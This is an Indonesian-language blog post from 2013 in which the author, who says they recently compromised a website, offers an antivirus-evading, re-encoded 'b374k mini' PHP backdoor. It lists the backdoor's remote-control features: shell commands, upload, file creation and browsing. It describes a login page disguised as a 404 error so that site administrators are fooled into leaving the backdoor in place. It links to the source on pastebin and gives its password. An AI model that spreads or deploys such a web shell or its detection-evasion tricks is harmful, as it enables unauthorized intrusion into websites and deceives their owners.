Rabu, 30 Januari 2013

[php] shell/backdoor b374k mini, with undetectable virus(tidak terdeteksi virus)

yup, akhirnya saya bisa kembali menulis stelah skian lama tidak menulis. kali ini saya akan share tentang backdoor php b374k mini yang telah saya encoding lagi, sehingga backdoor php ini aman dari scan antivirus, berhubung barusan saja saya meng owned website dan backdoor saya terdeteksi virus dan tidak bisa di jalankan.
telah di ketahui bahwa backdoor php termasuk salah satu jenis trojan yang meremote, sehingga bisa melakukan create file, upload file, remove, change-mode permission, bahkan sampai denial of service hanya dengan satu file php yang biasa di sebut backdoor.
fitur berikut tidak beda dengan fitur sebelumnya, yaitu :
jumping(lompat kodok)
shell command
upload
explore
create file
autentikasi ketika ingin mengakses backdoor/ di pintai password untuk mengakses backdoor.
autentikasi backdoor tersebut berupa tampilan

404

sehingga bisa mengecoh, menipu admin dari pada website tersebut sehingga backdoor attacker tetap aman dan tidak terhapus.
berikut link source code backdoor php tersebut: http://pastebin.com/jJSyu5dC passwordnya adalah: mysql

 

1 komentar:

Unknown mengatakan...

http://pastebin.com/jJSyu5dC

Posting Komentar

Hacking nyaeta Seni! Hacking --> campuran
tina kabisa, Kreatifitas jeng Kesabaran.